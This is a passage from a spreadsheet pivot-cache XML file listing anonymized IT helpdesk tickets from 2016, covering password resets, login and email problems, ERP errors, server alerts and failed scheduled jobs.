    <s v="rkyjnbqh kfshormi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="e&amp;o access request for partner team"/>
    <s v="_x000d__x000a__x000d__x000a_received from: izwtdnfq.xptuoaid@gmail.com_x000d__x000a__x000d__x000a_hi pradtheyp,_x000d__x000a__x000d__x000a_partner team will support myself and jintana to run e&amp;o report going forward. can you provide the access usaed to debaghjsish based on his email  eonhuwlg.sxthcobm@gmail.com&lt;mailto:eonhuwlg.sxthcobm@gmail.com&gt; ?._x000d__x000a__x000d__x000a_below is the e&amp;o access path required the access usaed to him._x000d__x000a__x000d__x000a_#/site/certified_content/views/eoreport-finance/timegraphfilters?:iid=1_x000d__x000a__x000d__x000a_  let me know once done. appreciate if you provide the access preferably by sep 2, next friday._x000d__x000a__x000d__x000a_  "/>
    <s v="izwtdnfq xptuoaid"/>
    <x v="19"/>
  </r>
  <r>
    <s v="qlhmawgi sgwipoxn mp_fb locked."/>
    <s v="qlhmawgi sgwipoxn mp_fb locked."/>
    <s v="dmvznstx jnpgzoxy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype anmeldung"/>
    <s v="ich habe gestern Ã¼ber den passwortmanager mein passwort geÃ¤ndert. seitdem funktioniert die skype anmeldung nicht mehr. weder mit dem neuen, noch mit dem alten passwort. fehlermeldung: der benutzername, das kennwort oder die domÃ¤ne scheint falsch zu sein."/>
    <s v="mhvbnqri sacvgzxf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access for igurwxhv ughynofq to mailbox"/>
    <s v="hi helpdesk, please give access to igurwxhv ughynofq from partner(outsouring company) to k-sg.inwarehouse_tools@company.com_x000d__x000a_"/>
    <s v="wzbahpxu phvyuwxb"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" plm cache server logging issue"/>
    <s v="as per attached email, we see an issue with cache server logging and also caching server working as well._x000d__x000a_please also look at the erp reply who raised questions on cache server accessibility."/>
    <s v="ujsyzrvw vjuyzcih"/>
    <x v="13"/>
  </r>
  <r>
    <s v="conduct goods movement with erp transaction mb11 from plant_205 to plant_245"/>
    <s v="from: iwazgesl ydgqtpbo [mailto:iwazgesl.ydgqtpbo@gmail.com] _x000d__x000a_sent: thursday, august 25, 2016 12:08 pm_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_cc: nkiopevt gufwhdky_eh_x000d__x000a_subject: tru : goods movement mb11 from plant_205 to plant_245_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a__x000d__x000a_could you please advise us how to conduct goods movement with erp transaction mb11 from plant_205 to plant_245? we are not able to do this._x000d__x000a__x000d__x000a_"/>
    <s v="iwazgesl ydgqtpbo"/>
    <x v="17"/>
  </r>
  <r>
    <s v="password reset alert from o365"/>
    <s v="password reset alert from o365"/>
    <s v="epbqhudt fumxovjz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user cwfzldts dlmukhyn cannot create purchasing requistions out of punch out catalogues"/>
    <s v="now he get the right document type, but he has several other problems.:_x000d__x000a_the wrong material group is shown (mendmre) istead of _x000d__x000a_default should be c-select_x000d__x000a_in accounting there should be &quot;costcenter&quot; as default, for him is order, and the gl account does not come up automatically. _x000d__x000a_i've got the information that all requisitioners of this plant had the problems. i will get a mail for a colleague with the person who has solved this issue. i will add it as soon as i have the mail._x000d__x000a__x000d__x000a_"/>
    <s v="cwfzldts dlmukhyn"/>
    <x v="29"/>
  </r>
  <r>
    <s v="latitude e7350 does not properly boot up - i get a blue empty screen with no log on mask"/>
    <s v="latitude e7350 does not properly boot up - i get a blue empty screen with no log on mask"/>
    <s v="fesmalcu qjlwvrnk"/>
    <x v="28"/>
  </r>
  <r>
    <s v="latitude 7275 does not boot up properly - got a blue empty screen - eagl8000055"/>
    <s v="latitude 7275 does not boot up properly - got a blue empty screen - eagl8000055"/>
    <s v="ptyxefvk fhazbrwn"/>
    <x v="28"/>
  </r>
  <r>
    <s v="support fÃ¼r umbau \ we22 \ port 22 \niptbwdq csenjruz"/>
    <s v="support fÃ¼r umbau \ we22 \ port 22 \niptbwdq csenjruz"/>
    <s v="niptbwdq csenjruz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="umbau rechner ewew8323542 \ port 21 \niptbwdq csenjruz"/>
    <s v="umbau rechner ewew8323542 \ port 21 \niptbwdq csenjruz"/>
    <s v="niptbwdq csenjruz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \instandsetzung\ nfayqjhg kyswcpei"/>
    <s v="setup new ws \instandsetzung\ nfayqjhg kyswcpei"/>
    <s v="nfayqjhg kyswcpei"/>
    <x v="24"/>
  </r>
  <r>
    <s v="ms office /outlook issue"/>
    <s v="ms office /outlook issue"/>
    <s v="iowkrcpd snrvlhyc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot use copy to option in engineering tool : getting error message."/>
    <s v="cannot use copy to option in engineering tool : getting error message._x000d__x000a_it never worked for user._x000d__x000a_anticipating access issue."/>
    <s v="fbgetczn jlsvxura"/>
    <x v="10"/>
  </r>
  <r>
    <s v="support fÃ¼r umzug \qwynjdbk eamnvwyh"/>
    <s v="support fÃ¼r umzug \qwynjdbk eamnvwyh"/>
    <s v="qwynjdbk eamnvwyh"/>
    <x v="24"/>
  </r>
  <r>
    <s v="circuit outage  : traversecity : static-vpn-4331-rtr02 down since 8/25/2016 1:00 am est (site up on primary)"/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ______yes___     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______8/25/2016 1:00 am est_______________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ____no___    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? _no______    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  __yes____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ___yes____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _____na______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ______na_____    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  ___yes____     (yes/no/na) _x000d__x000a__x000d__x000a_11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ___________na______________       _x000d__x000a__x000d__x000a_12. notified  gsc  __yes______     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="uxgrdjfc kqxdjeov"/>
    <x v="7"/>
  </r>
  <r>
    <s v="change of  computer to user parrfgyksm - telephony_software set up change"/>
    <s v="please set up new computer changed to user parrfgyksm."/>
    <s v="antigvjx zekluqim"/>
    <x v="6"/>
  </r>
  <r>
    <s v="password reset alert from o365"/>
    <s v="password reset alert from o365"/>
    <s v="eylqgodm ybqkwiam"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mp_fb   konto gesperrt"/>
    <s v="keine anmeldung mÃ¶glich"/>
    <s v="lqjoagzt gqueiatx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="keine netzwerkverbindung"/>
    <s v="eemw8144234 keine netzwerkverbindung kÃ¶nnen hergestellt werden"/>
    <s v="jbifdshu jzercpoq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="email queries"/>
    <s v="email queries"/>
    <s v="zfliqpxm dgfvaqlh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 lock out issue and password reset "/>
    <s v="erp SID_34 lock out issue and password reset user id : bhergtyemm "/>
    <s v="antigvjx zekluqim"/>
    <x v="0"/>
  </r>
  <r>
    <s v="aw: please take this survey related to ticket_no0433553"/>
    <s v="_x000a__x000a_received from: tgpvrbyi.ztdxwpcn@gmail.com_x000a__x000a_sehr geehrter hr. souzarft,_x000a__x000a_noch immer kein zugriff._x000a__x000a__x000a_freundliche grÃ¼ÃŸe/ best "/>
    <s v="tgpvrbyi ztdxwpcn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can't copy/save pdf of drawing from business_client"/>
    <s v="application used to work till aug 23. user was able to copy / save pdf from business_client. since aug 24th user wasn't able anymore. "/>
    <s v="edanpfzl qyrfndkp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="kein zugriff auf server mÃ¶glich!"/>
    <s v="meldung: fehler bei der erneuten verbindungsherstellung von ...: mit \\HostName_579\....."/>
    <s v="tqrylspg ijzghqwy"/>
    <x v="11"/>
  </r>
  <r>
    <s v=" authorization add/delete members"/>
    <s v=" _x000d__x000a__x000d__x000a_"/>
    <s v="hpmwliog kqtnfvrl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open outlook client"/>
    <s v="unable to open outlook client"/>
    <s v="jxpmkhay ruvnpyqb"/>
    <x v="18"/>
  </r>
  <r>
    <s v="aw: please take this survey related to ticket_no0433617"/>
    <s v="_x000a__x000a_received from: efjzbtcm.mdpviqbf@gmail.com_x000a__x000a_nein funktioniert noch nicht_x000a__x000a__x000a_efjzbtcm mdpviqbf_x000a_company productions gmbh &amp; co. kg_x000a_versand/logistik/ff-wear_x000a__x000a_email: efjzbtcm.mdpviqbf@gmail.com&lt;mailto:efjzbtcm.mdpviqbf@gmail.com&gt;_x000a__x000a_company produktions gmbh &amp; co. kg_x000a_geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx, naruedlk mpvhakdq_x000a__x000a_von: global it ticketing_tool [mailto:company@ticketing_tool.com]_x000a_gesendet: mittwoch, 24. august 2016 22:02_x000a_an: efjzbtcm mdpviqbf_x000a_betreff: please take this survey related to ticket_no1544728_x000a__x000a_please do not reply to or forward this email. use ticketing_tool to open a new ticket._x000a__x000a_we value your input. please help us by taking the time to fill out this short survey._x000a__x000a_click here to take the survey&lt;_x000a__x000a__________________________________x000a__x000a__x000a_number: ticket_no1544728_x000a_resolved by: olckhmvx pcqobjnd_x000a_short description: beim Ã¶ffnen oder speichern kommt immer wieder eine meldung_x000a_click here to view: link&lt;_x000a__________________________________x000a_comments:_x000a__________________________________x000a_08-24-2016 16:00:58 edt - olckhmvx pcqobjndadditional comments_x000a_hallo frau maier,_x000a__x000a_bitte probieren sie jetzt und geben sie bescheid ob sie zugriff haben oder nicht._x000a__x000a_mfg,_x000a_dan_x000a_gso"/>
    <s v="efjzbtcm mdpviqbf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="collaboration_platform for business not sync"/>
    <s v="_x000d__x000a__x000d__x000a_received from: eylqgodm.ybqkwiam@gmail.com_x000d__x000a__x000d__x000a_collaboration_platform for business dose not take my credentials to sync_x000d__x000a__x000d__x000a_best "/>
    <s v="eylqgodm ybqkwiam"/>
    <x v="0"/>
  </r>
  <r>
    <s v="one user cannot receive e-mail from bank of amrice, cashpro online"/>
    <s v="_x000d__x000a__x000d__x000a_received from: uagqromi.sqgtkmci@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_shunshen.wanrtyg@company.com&lt;mailto:shunshen.wanrtyg@company.com&gt;_x000d__x000a__x000d__x000a_cannot receive e-mail from bank of amrice, cashpro online.  mr. wanrtyg is a partner member, but other partner staffs receive mails from bank.  please resolve._x000d__x000a__x000d__x000a_"/>
    <s v="uagqromi sqgtkmci"/>
    <x v="9"/>
  </r>
  <r>
    <s v="profile and email client setup"/>
    <s v="ghkkytu,_x000d__x000a_  configure user login for below e-mail details, "/>
    <s v="antigvjx zekluqim"/>
    <x v="18"/>
  </r>
  <r>
    <s v="os reinstall"/>
    <s v="os reinstall"/>
    <s v="kflqpite gbeoqsnc"/>
    <x v="18"/>
  </r>
  <r>
    <s v="os installation "/>
    <s v="reimage the laptop"/>
    <s v="kflqpite gbeoqsnc"/>
    <x v="18"/>
  </r>
  <r>
    <s v="os installation"/>
    <s v="os reinstallation on e6420 laptop."/>
    <s v="kflqpite gbeoqsnc"/>
    <x v="18"/>
  </r>
  <r>
    <s v="abend batch job Job_1967e"/>
    <s v="job name: Job_1967e  abended."/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="5"/>
  </r>
  <r>
    <s v="inwarehouse_tool not creating"/>
    <s v="_x000d__x000a__x000d__x000a_received from: uisewznr.ewtmkphs@gmail.com_x000d__x000a__x000d__x000a_hi team,_x000d__x000a__x000d__x000a_delivery # 9168077553 is not creating an inwarehouse_tool and i cannot see any reason why it is not creating. can you please resolve this issue? "/>
    <s v="uisewznr ewtmkphs"/>
    <x v="12"/>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cvnzhbfa qcvzyrgo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2: login issue"/>
    <s v="login issue_x000d__x000a_-checked the user name in ad and unlocked the account._x000d__x000a_-advised the user to login and check._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="voalfshq eihcmgnl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="my global_telecom_1 two in one can't be connected.  there is signal but &quot;limited&quot;."/>
    <s v="name:lertfty zuothryrt_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:kirtyrghwc.ykjrbivs@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:my global_telecom_1 two in one can't be connected.  there is signal but &quot;limited&quot;."/>
    <s v="kilrghwc ykjrbivs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="folder access to \\HostName_717\teams\kvp3-projekte"/>
    <s v="permission: write and read_x000d__x000a__x000d__x000a_location: germany"/>
    <s v="xsjqhdgp ymstzudl"/>
    <x v="33"/>
  </r>
  <r>
    <s v="mii password reset for wiggrtgyis"/>
    <s v="mii password reset for wiggrtgyis"/>
    <s v="sbgfycot quhzgatm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_1010(erp search_server server): erpstartsrv.exe service is down "/>
    <s v="HostName_1010(erp search_server server): erpstartsrv.exe service is down "/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="13"/>
  </r>
  <r>
    <s v="vtykrubi whsipqno's title"/>
    <s v="_x000a__x000a_received from: hkrecpfv.kgwpbexv@gmail.com_x000a__x000a_good afternoon.  i noticed that rtgyon's title is incorrect in skype.  who can correct it?  he is not chairman of company, just president and ceo._x000a__x000a_[cid:image001.png@01d1fe24.eaf9c410]_x000a__x000a_"/>
    <s v="hkrecpfv kgwpbexv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="what is this trailing mail?"/>
    <s v="what is this trailing mail?"/>
    <s v="ygkzwsud cvjgkxws"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i'm using collaboration_platform in crm. why are all my collaboration_platform notebooks shared with +20 people i don't know and dind't share my noteb"/>
    <s v="all my collaboration_platform notebooks are shared with +20 people i don't know. i did not share my notebook with them and i cannot remove their shared status ! how is this possible???"/>
    <s v="kzbrimwx dconpwbu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="error on erp"/>
    <s v="error on erp"/>
    <s v="khufscza qoixpave"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ess password reset"/>
    <s v="ess password reset"/>
    <s v="qkvzexta ehlvgouc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need to see all unread emails"/>
    <s v="need to see all unread emails"/>
    <s v="pfzxecbo ptygkvzl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="do not have access to bobj"/>
    <s v="do not have access to bobj"/>
    <s v="dymwulbi dkbvqhna"/>
    <x v="8"/>
  </r>
  <r>
    <s v="multiple pages print while printing single email."/>
    <s v="multiple pages print while printing single email._x000a_-checked the driver settings and updated the printer drivers._x000a_-abl eto print single word, excel, pdf documents._x000a_-when the user tries to print any email from the outlook, it shows multiple pages._x000a_-see attachment=== _x000a_=231_x000a_"/>
    <s v="jrxsdcna iyhktobe"/>
    <x v="2"/>
  </r>
  <r>
    <s v="how to delay email sending?"/>
    <s v="_x000d__x000a__x000d__x000a_received from: iygsxftl.hysrbgad@gmail.com_x000d__x000a__x000d__x000a_dear all,_x000d__x000a__x000d__x000a_please can you explain how to delay email sending? this was possible with my earlier outlook version._x000d__x000a__x000d__x000a_[cid:image005.jpg@01d1fe48.23ed4df0]_x000d__x000a__x000d__x000a_with my current version 'outlook 2013' the delayed sending does not work if my computer and outlook are shut down. email will be sent only when i will restart outlook._x000d__x000a__x000d__x000a_[cid:image006.jpg@01d1fe48.23ed4df0]_x000d__x000a__x000d__x000a_is there any chance to fix this?_x000d__x000a__x000d__x000a_"/>
    <s v="iygsxftl hysrbgad"/>
    <x v="0"/>
  </r>
  <r>
    <s v="add role to access e-recruit"/>
    <s v="hi,_x000a__x000a_please also add (er:rcf_recruiter) role to imzctxhr odmawbij and jusfrttin gtehdnyuerrf also._x000a__x000a_"/>
    <s v="qcehailo wqynckxg"/>
    <x v="19"/>
  </r>
  <r>
    <s v="skype login issue"/>
    <s v="_x000a__x000a_received from: crkdjbot.qiztrxne@gmail.com_x000a__x000a_helloâ€¦ i have been unable to sign into skype for several days._x000a__x000a_[cid:image001.png@01d1fe15.30402581]_x000a__x000a__x000a_best,_x000a_debgrtybie savgrtyuille_x000a_sr. corporate paralegal_x000a__x000a_crkdjbot.qiztrxne@gmail.com&lt;mailto:crkdjbot.qiztrxne@gmail.com&gt;_x000a__x000a__x000a__x000a_"/>
    <s v="crkdjbot qiztrxne"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_184: volume: /dev/software on server: HostName_184 is over 85% space consumed.remaining only 15%"/>
    <s v="HostName_184: volume: /dev/software on server: HostName_184 is over 85% space consumed.remaining only 15%"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="46"/>
  </r>
  <r>
    <s v="HostName_1132:oracle finance_app financial management - web tier/ java server (epmsystem2) - service monitor"/>
    <s v="HostName_1132:oracle finance_app financial management - web tier (epmsystem2) - service monitor(down)_x000d__x000a_HostName_1132:oracle finance_app financial management - java server (epmsystem2) - service monitor"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="11"/>
  </r>
  <r>
    <s v="a link on an e-mail says i am &quot;forbidden&quot;"/>
    <s v="an e-mail from  it training has email hints and tips #1.  under &quot;create signature&quot; it has a link &quot;company formatheywting standard&quot; that i am forbidden to see._x000a_615"/>
    <s v="mfvkxghn mzjasxqd"/>
    <x v="70"/>
  </r>
  <r>
    <s v="there were 3 undeliverable e-mails returned with a ethics e-mail request."/>
    <s v="there were 3 undeliverable e-mails returned with a ethics e-mail request._x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_there were 3 undeliverable e-mails returned with a ethics e-mail request._x000d__x000a__x000d__x000a_please advise._x000d__x000a__x000d__x000a_"/>
    <s v="crkdjbot qiztrxne"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp round off on total"/>
    <s v="we entered so 35941677, total of order should be $1,150.50 but erp is rounding it off to $1,151.70  it is creating a 20 cent difference.  this order is one of few and is causing quite a bit of re-invoicing and payment rejections.  "/>
    <s v="iqbyrtop izpmvgfq"/>
    <x v="12"/>
  </r>
  <r>
    <s v="scrap reason code (two issues)"/>
    <s v="two issues:_x000d__x000a_1. mii asks for a reason code when scrap quantity is entered as zero. most operator put zero to be sure that they're not entering any scrap. intended behavior is that if scrap field is blank or has zero, system shouldn't ask for scrap reason code_x000d__x000a_2. if we enter invalid reason code, the save button is disabled after warning message - so operator can't fix invalid data but has to close the confirmation window, type information again and then enter - can we fix this? "/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="instalaÃ§Ã£o guardiÃ£o (banco hsbc)"/>
    <s v="gentileza, instalar o guardiÃ£o do banco hsbc para utilizaÃ§Ã£o de transaÃ§Ãµes pela internet."/>
    <s v="btxfwisc mapbkflt"/>
    <x v="62"/>
  </r>
  <r>
    <s v="user called to know if there was an outage in usa"/>
    <s v="user called to know if there was an outage in usa"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job jobuacyltoe hxgaycze failed in job_scheduler at: 08/24/2016 13:01:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job jobuacyltoe hxgaycze failed in job_scheduler at: 08/24/2016 13:01:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="59"/>
  </r>
  <r>
    <s v="job jobuacyltoe hxgaycze failed in job_scheduler at: 08/24/2016 12:56:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job jobuacyltoe hxgaycze failed in job_scheduler at: 08/24/2016 12:56:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="59"/>
  </r>
  <r>
    <s v="job HostName_1019failagain_1 failed in job_scheduler at: 08/24/2016 12:56:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019failagain_1 failed in job_scheduler at: 08/24/2016 12:56:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="59"/>
  </r>
  <r>
    <s v="svc-now ticket found... doing nothing  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_svc-now ticket found... doing nothing"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="59"/>
  </r>
  <r>
    <s v="svc-now ticket found... doing nothing  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_svc-now ticket found... doing nothing"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="59"/>
  </r>
  <r>
    <s v="svc-now ticket found... doing nothing  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_svc-now ticket found... doing nothing"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="59"/>
  </r>
  <r>
    <s v="unlocked all accounts on password manager "/>
    <s v="unlocked all accounts on password manager "/>
    <s v="ghfvmpqi fehkscza"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open originals from engineering tool"/>
    <s v="when opening originals from engineering tool, below error occurs._x000d__x000a__x000d__x000a_process: _x000d__x000a_fetch originals from erp system._x000d__x000a__x000d__x000a_[jco3 - error]"/>
    <s v="tfyhebmk elywjuvm"/>
    <x v="10"/>
  </r>
  <r>
    <s v="cannot get access to email"/>
    <s v="same issue as yesterday, it called and fixed the issue, but back to work today and still cannot get into email"/>
    <s v="rqnxlkce nvrzduyk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log in to netweaver"/>
    <s v="unable to log in to netweaver"/>
    <s v="ghfvmpqi fehkscza"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request to reset microsoft online services password for jcsmxrgl.ibhsnket@gmail.com"/>
    <s v="request to reset microsoft online services password for jcsmxrgl.ibhsnket@gmail.com"/>
    <s v="jcsmxrgl ibhsnket"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0409509"/>
    <s v="ticket update on ticket_no0409509"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_853640"/>
    <s v="ticket update on inplant_853640"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for igkqpndy swqndxhl on other / telephony_software"/>
    <s v="hello,_x000d__x000a__x000d__x000a_please reset password for user duffym, as she has forgotten it and therefore cannot log into her interaction desktop. please provide magdalena with the new password._x000d__x000a__x000d__x000a_"/>
    <s v="igkqpndy swqndxhl"/>
    <x v="6"/>
  </r>
  <r>
    <s v="ticket update inplant_853261"/>
    <s v="ticket update inplant_853261"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request to reset microsoft online services password for rovsabyl.idpvbjtw@gmail.com"/>
    <s v="request to reset microsoft online services password for rovsabyl.idpvbjtw@gmail.com"/>
    <s v="rovsabyl idpvbjtw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="we are currently unable to post inwarehouse_tool doc. # 6223592434 for po 5616473800. please advice how to proceed."/>
    <s v="we are currently unable to post inwarehouse_tool doc. # 6223592434 for po 5616473800. please advice how to proceed."/>
    <s v="dmlnpgkv ophsnmbr"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job HostName_1019failagain failed in job_scheduler at: 08/24/2016 11:05:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019failagain failed in job_scheduler at: 08/24/2016 11:05:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="59"/>
  </r>
  <r>
    <s v="job HostName_1019fail failed in job_scheduler at: 08/24/2016 11:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019fail failed in job_scheduler at: 08/24/2016 11:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="59"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0433651"/>
    <s v="ticket update on ticket_no0433651"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mailbox configuration "/>
    <s v="_x000a__x000a_received from: sylvthryia.sidor@company.com_x000a__x000a_good afternoon,_x000a__x000a__x000a_i am writing to ask about a few things regarding my new mailbox._x000a__x000a__x000a_1. the name in the email address (sylvthryia) is incorrect; can it be amended to sylvthryia (with w)?_x000a__x000a__x000a_2. is it possible to change my password? i tried to do this online in the application, but it states that it is impossible._x000a__x000a__x000a_3. i would like to be able to access my mailbox using software (ms office 2013). if it is possible, what would be the configuration data to be used?_x000a__x000a__x000a_4. i would like to update my signature. could you please advise where this can be done?_x000a__x000a__x000a_"/>
    <s v="aqmwpyxk alebcyor"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user unable to log onto ticketing_tool!"/>
    <s v="_x000a__x000a_received from: kxsceyzo.naokumlb@gmail.com_x000a__x000a_userid: hntubjela_x000a_name nivqoxyt ivrhjmnx_x000a__x000a_user is unable to create ticketing_tool tickets!_x000a_"/>
    <s v="kxsceyzo naokumlb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="tool repoter"/>
    <s v="from: nwfodmhc exurcwkm _x000a_sent: wednesday, august 24, 2016 8:17 pm_x000a_to: 'srujan enterprises'; nwfodmhc exurcwkm_x000a_cc: avsbdhyu sahryu; sihtvocw yspnqxgw_x000a_subject: re: engineering tool_x000a__x000a_hi_x000a__x000a_please go through the attachment and configure accordingly._x000a_please contact us back if you still face any issue._x000a__x000a__x000a__x000a_"/>
    <s v="vxhyftae tbkyfdli"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job HostName_1019fail failed in job_scheduler at: 08/24/2016 10:46:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019fail failed in job_scheduler at: 08/24/2016 10:46:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="59"/>
  </r>
  <r>
    <s v="computer lrrw8514654 -  us_plant location252"/>
    <s v="_x000a__x000a_received from: dpuifqeo.eglwsfkn@gmail.com_x000a__x000a_user â€“ bghrbie crhyley â€“ has this issue:_x000a__x000a_excel isn't working properly. it keeps going to not responding._x000a_i have restarted several times to correct that. now if i work on a spreadsheet,_x000a_save it and minimize it i can't open it back up. i have had to restart the computer and_x000a_open excel again to get to the worksheet. this has happened twice. do you have any ideas i could try?_x000a__x000a__x000a_"/>
    <s v="dpuifqeo eglwsfkn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="from: nwfodmhc exurcwkm _x000d__x000a_sent: wednesday, august 24, 2016 8:11 pm_x000d__x000a_to: 'frederirtck.gtehdnyu@company.com'_x000d__x000a_cc: tiyhum kuyiomar_x000d__x000a_subject: request to reset microsoft online services password for frederirtck.gtehdnyu@company.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_please change your password in : _x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="jdeoycaq geqctmlh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="usa print check"/>
    <s v="usa print check"/>
    <s v="rdfjsawg zpmxgdcw"/>
    <x v="14"/>
  </r>
  <r>
    <s v="urgent: only the highlighted (attachment) are showing up in 'my active accounts' in crm"/>
    <s v="only the highlighted (attachment) are showing up in 'my active accounts' in crm_x000a__x000a_phone; 309"/>
    <s v="vupmctne ylnsweao"/>
    <x v="39"/>
  </r>
  <r>
    <s v="HostName_145 (erp SID_28): volume: /dev/hd3 on server is over 85% space consumed. space available: 257mb"/>
    <s v="HostName_145 (erp SID_28): volume: /dev/hd3 on server is over 85% space consumed. space available: 257mb"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="46"/>
  </r>
  <r>
    <s v="job Job_1953b failed in job_scheduler at: 08/24/2016 10:24:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1953b failed in job_scheduler at: 08/24/2016 10:24:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="outlook is continuously asking for password."/>
    <s v="outlook is continuously asking for password."/>
    <s v="ouymgzat jfzmeaoy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to attach a document in erp"/>
    <s v="unable to attach a document in erp"/>
    <s v="pbfscenq qvaylkne"/>
    <x v="0"/>
  </r>
  <r>
    <s v="netweaver is locked out."/>
    <s v="netweaver is locked out."/>
    <s v="pbdtxowu yfqzibtv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account unlock"/>
    <s v="account unlock"/>
    <s v="dhraxivp enmfvuqb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="telephony_software software not configured"/>
    <s v="telephony_software software not configured"/>
    <s v="zylaexnv pvkzbduh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0432827"/>
